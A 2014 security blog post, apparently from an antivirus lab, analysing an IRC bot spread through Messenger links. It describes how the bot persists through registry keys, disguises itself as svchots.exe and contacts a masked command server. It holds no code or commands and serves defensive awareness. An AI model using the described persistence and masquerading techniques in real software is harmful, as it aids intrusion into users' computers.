Do you get mad if I post this photo of yours on my facebook?: Messenger bots

Yesterday we received a notification that a link, from which a malicious executable could be downloaded, was propagating through Messenger. This malware is able to contact a remote server and, using specific instructions, take control of the infected computer.

 

 



The sample downloaded was l7fa7bjnoon-77be2268ce.exe; which, at the time of this analysis, was identified as a threat by the following antivirus engines:

 

 

Its signatures are these:

 



During execution, the simple copied itself with the name scheb.exe to the path:

C:\Documents and Settings\<user>\Program Data\.

 

It also started a process, with the same name, that established a connection with the IRC server 50.X.X.10 through the port 6667.

 

 

 



Furthermore, it modified Windows registry to ensure its execution on every system startup.

 



When analyzing the network traffic generated by the bot, the connection data to the server were obtained.

 

On the other hand, the bot updated automatically as the executable bzhmer.com52eac7da1d.exe.

 

 

 

The propagation message was also updated and, after this, the malicious executable displayed the fake message.

 

 

When executing bzhmer.com52eac7da1d.exe, the process svchots.exe was created. As can be seen, its name is quite similar to the system process svchost.exe; with this, the malware creator attempts to confuse the user and make him/her believe it is a valid process.

 

This new process also connected to the server IRC 50.X.X.10, through the port 6667.

 

 

 

A new key with the name of the fake process was created on the registry.

.

 

As it has been published before, malware propagation through Messenger and using the name of a popular social network as a reference became one of the most successful attack vectors used by cybercriminals. The best thing we can do when we receive this kind of messages from a contact is to close the window and let our contact know that its computer is very likely infected.

 

This type of messages is and will still be very common and, as usual, the best way to defend ourselves against them is to be informed.

Submitted by lgonzalez on Tue, 02/04/2014 - 20:23